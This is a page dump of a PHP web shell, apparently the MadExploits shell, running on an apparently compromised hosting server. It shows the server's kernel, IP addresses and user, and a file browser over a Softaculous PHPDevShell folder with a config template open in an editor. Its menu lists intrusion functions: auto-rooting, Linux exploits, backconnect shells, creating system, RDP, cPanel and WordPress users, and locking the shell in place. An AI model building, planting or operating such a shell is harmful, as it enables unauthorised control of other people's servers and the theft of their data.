Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.189.188.121
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
phpdevshell /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
edit.php
4.84
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
115
B
-rw-r--r--
import.php
3.88
KB
-rw-r--r--
info.xml
1.5
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.95
KB
-rw-r--r--
install.xml
919
B
-rw-r--r--
md5
2.04
KB
-rw-r--r--
notes.txt
50
B
-rw-r--r--
single-site.config.php
1.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single-site.config.php
<?php ////////////////////////////////////////////////////////////////////////////////////////// // Mandatory Settings, these settings must be changed for the system to work correctly. // ////////////////////////////////////////////////////////////////////////////////////////// $master = $configuration['master_database']; /** * Database details. * MySQL database name. * @global string */ $configuration[$master]['database'] = '[[softdb]]'; /** * Database details. * MySQL database username. * @global string */ $configuration[$master]['username'] = '[[softdbuser]]'; /** * Database details. * MySQL database password. * @global string */ $configuration[$master]['password'] = '[[softdbpass]]'; // NONE MANDATORY. // You might want to consider changing these setting while you are developing. // IT IS VERY IMPORTANT TO SWITCH THEM TO SAFE SETTING WHEN GOING INTO PRODUCTION. // Use settings from PHPDS-defaults.config.php to extend this file and override defaults. ///////////////////////////////////////////////////////////////////////////////////////// /** * When your system goes to production, set this to TRUE to avoid informations leaks. * Will force compile on template engine. * * Overrides most 'debug' and 'error' settings * * PS: IT WONT SHOW NOTICES OR GENERAL ERRORS IF THIS IS TRUE. * * @var boolean */ $configuration['production'] = false; /** * To what email should critical errors be emailed to, make sure php can send mail, this does not use the PHPDevShell mailing engine. * * @global string */ $configuration['error']['email_critical'] = '[[admin_email]]';
Close